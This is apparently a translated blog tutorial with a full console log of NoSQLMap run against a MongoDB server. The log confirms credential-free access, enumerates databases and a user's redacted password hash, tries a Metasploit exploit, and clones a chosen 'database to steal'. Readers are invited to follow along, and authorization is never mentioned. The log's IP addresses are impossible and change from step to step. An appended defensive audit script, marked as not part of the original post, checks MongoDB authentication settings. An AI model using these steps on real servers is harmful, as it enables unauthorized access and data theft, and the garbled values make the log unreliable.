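Today I used NoSQLMap to run attack tests against MongoDB. There are plenty of examples online, but they only point to where to download the tool and include no actual operation log, so I am posting my log here to show how to do it step by step.
1. First download the open-source NoSQLMap Python code. Download URL: https://github.com/codingo/NoSQLMap
Note that the Python code downloaded here targets version 2.7. If you use Python 3.x you have to change some of the syntax, for example print(), and raw_input has to be changed to the input function; add any missing third-party libraries yourself. With Python 2.x no changes are needed.
2. The final Python code structure is as follows:
3. To start it, run python nosqlmap.py. The procedure is the same on Linux and Windows.
4. Finally, here is the log of a successful start and the operations that followed. First-time users can follow along step by step.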
D:\python\python.exe F:/nosqlMap/nosqlMap/NoSQLMap-master/nosqlmap.py
'clear' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
_ _ ___ ___ _ __ __
| \| |___/ __|/ _ \| | | \/ |__ _ _ __
| .` / _ \__ \ (_) | |__| |\/| / _` | '_ \
|_|\_\___/___/\__\_\____|_| |_\__,_| .__/
v0.7 codingo@protonmail.com |_|
1-Set options
2-NoSQL DB Access Attacks
3-NoSQL Web App attacks
4-Scan for Anonymous MongoDB Access
5-Change Platform (Current: MongoDB)
x-Exit
Select an option: 1
Options
1-Set target host/IP (Current: Not Set)
2-Set web app port (Current: 80)
3-Set App Path (Current: Not Set)
4-Toggle HTTPS (Current: OFF)
5-Set MongoDB Port (Current : 27017)
6-Set HTTP Request Method (GET/POST) (Current: GET)
7-Set my local MongoDB/Shell IP (Current: Not Set)
8-Set shell listener port (Current: Not Set)
9-Toggle Verbose Mode: (Current: OFF)
0-Load options file
a-Load options from saved Burp request
b-Save options file
h-Set headers
x-Back to main menu
<!-- Operation 1: selected option 1 -->
Select an option: 1
Enter the host IP/DNS name: 172.17.202.441
Target set to 172.17.202.441
Options
1-Set target host/IP (Current: 172.17.202.441)
2-Set web app port (Current: 80)
3-Set App Path (Current: Not Set)
4-Toggle HTTPS (Current: OFF)
5-Set MongoDB Port (Current : 27017)
6-Set HTTP Request Method (GET/POST) (Current: GET)
7-Set my local MongoDB/Shell IP (Current: Not Set)
8-Set shell listener port (Current: Not Set)
9-Toggle Verbose Mode: (Current: OFF)
0-Load options file
a-Load options from saved Burp request
b-Save options file
h-Set headers
x-Back to main menu
<!-- Operation 2: selected option 7 -->
Select an option: 7
Enter the host IP for my MongoDB/Shells: 172.17.202.4111
Shell/DB listener set to 172.17.202.4111
Options
1-Set target host/IP (Current: 172.17.202.4411)
2-Set web app port (Current: 80)
3-Set App Path (Current: Not Set)
4-Toggle HTTPS (Current: OFF)
5-Set MongoDB Port (Current : 27017)
6-Set HTTP Request Method (GET/POST) (Current: GET)
7-Set my local MongoDB/Shell IP (Current: 172.17.202.4111)
8-Set shell listener port (Current: Not Set)
9-Toggle Verbose Mode: (Current: OFF)
0-Load options file
a-Load options from saved Burp request
b-Save options file
h-Set headers
x-Back to main menu
<!-- Operation 3: selected option 8 -->
Select an option: 8
Enter TCP listener for shells: 80
Shell TCP listener set to 80
Options
1-Set target host/IP (Current: 172.17.202.4411)
2-Set web app port (Current: 80)
3-Set App Path (Current: Not Set)
4-Toggle HTTPS (Current: OFF)
5-Set MongoDB Port (Current : 27017)
6-Set HTTP Request Method (GET/POST) (Current: GET)
7-Set my local MongoDB/Shell IP (Current: 172.17.202.411)
8-Set shell listener port (Current: 80)
9-Toggle Verbose Mode: (Current: OFF)
0-Load options file
a-Load options from saved Burp request
b-Save options file
h-Set headers
x-Back to main menu
<!-- Operation 4: selected x to return to the main menu -->
Select an option: x
'clear' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
_ _ ___ ___ _ __ __
| \| |___/ __|/ _ \| | | \/ |__ _ _ __
| .` / _ \__ \ (_) | |__| |\/| / _` | '_ \
|_|\_\___/___/\__\_\____|_| |_\__,_| .__/
v0.7 codingo@protonmail.com |_|
1-Set options
2-NoSQL DB Access Attacks
3-NoSQL Web App attacks
4-Scan for Anonymous MongoDB Access
5-Change Platform (Current: MongoDB)
x-Exit
<!-- Operation 5 -->
Select an option: 2
DB Access attacks (MongoDB)
=================
Checking to see if credentials are needed...
Successful access with no credentials!
MongoDB web management closed or requires authentication.
1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu
<!-- Operation 6 -->
Select an attack: 1
Server Info:
MongoDB Version: 3.0.7
Debugs enabled : False
Platform: 64 bit
1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu
Select an attack: 2
List of databases:
admin
XXX
XXX
XXX
XXX
test
List of collections:
admin:
system.indexes
system.version
system.users
fs.chunks
fs.files
Database Users and Password Hashes:
Username: appAdmin
'pwdXXXXXX'
Error: Couldn't list collections. The provided credentials may not have rights.
1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu
<!-- Operation 7 -->
Select an attack: 3
GridFS enabled on database admin
list of files:
GridFS enabled on database cornerstone
list of files:
GridFS enabled on database CPM
list of files:
GridFS enabled on database FileDB
list of files:
GridFS enabled on database local
list of files:
GridFS enabled on database test
list of files:
1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu
<!-- Operation 8 -->
Select an attack: 5
Something went wrong. Make sure Metasploit is installed and path is set, and all options are defined.
Press enter to continue...
1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu
<!-- Operation 9 -->
Select an attack: 4
1-admin
2-XXX
3-XXX
4-XXX
5-XXX
6-test
Select a database to steal: 6
Does this database require credentials (y/n)? n
Something went wrong. Are you sure your MongoDB is running and options are set? Press enter to return...
1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu
<!-- Operation 10 -->
Select an attack: 4
1-admin
2-XXX
3-XXX
4-XXX
5-XXX
6-test
Select a database to steal: 6
Does this database require credentials (y/n)? n
<!-- The operation finally succeeded -->
Database cloned. Copy another (y/n)?
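
Every step in the log above works because the target mongod accepts connections without credentials. As an added example (not part of the original post or of NoSQLMap), the Python below audits a mongod configuration for the settings behind that result. The dictionary shape follows the parsed document returned by MongoDB's getCmdLineOpts command; the sample configurations and the names audit and non_loopback are constructed for illustration.

```python
# Added example (not NoSQLMap code): audit mongod settings behind the no-credential access above.
import ipaddress

# Constructed samples shaped like the "parsed" document returned by
# db.adminCommand({getCmdLineOpts: 1}); all values are illustrative.
EXPOSED = {"net": {"port": 27017, "bindIp": "0.0.0.0"}}
HARDENED = {"net": {"port": 27017, "bindIp": "127.0.0.1,10.0.0.5"},
            "security": {"authorization": "enabled"}}


def non_loopback(bind_ip):
    """Return the entries of a comma-separated bindIp that are not local-only."""
    reachable = []
    for addr in (a.strip() for a in bind_ip.split(",")):
        if not addr or addr == "localhost" or addr.startswith("/"):
            continue  # empty entry, loopback name, or Unix socket path
        try:
            if ipaddress.ip_address(addr).is_loopback:
                continue
        except ValueError:
            pass  # a hostname: assume it is reachable from the network
        reachable.append(addr)
    return reachable


def audit(parsed, version=(3, 0, 7)):
    """Return (setting, finding) pairs for a parsed mongod configuration."""
    findings = []
    net = parsed.get("net", {})
    sec = parsed.get("security", {})
    # A keyFile implies access control even without an explicit authorization key.
    auth_on = sec.get("authorization") == "enabled" or "keyFile" in sec
    if not auth_on:
        findings.append(("security.authorization", "access control is off"))
    if "bindIp" in net:
        reachable = non_loopback(net["bindIp"])
    else:
        # Before 3.6 mongod listens on all interfaces when bindIp is unset.
        reachable = ["0.0.0.0"] if version < (3, 6) else []
    if reachable and not auth_on:
        findings.append(("net.bindIp", "no-auth listener on " + ", ".join(reachable)))
    if net.get("http", {}).get("enabled"):
        findings.append(("net.http.enabled", "legacy HTTP interface is on"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("exposed", EXPOSED), ("hardened", HARDENED)):
        print(name, audit(cfg))
```

The default version argument matches the 3.0.7 server reported in the log; pass the real server version when checking a newer deployment.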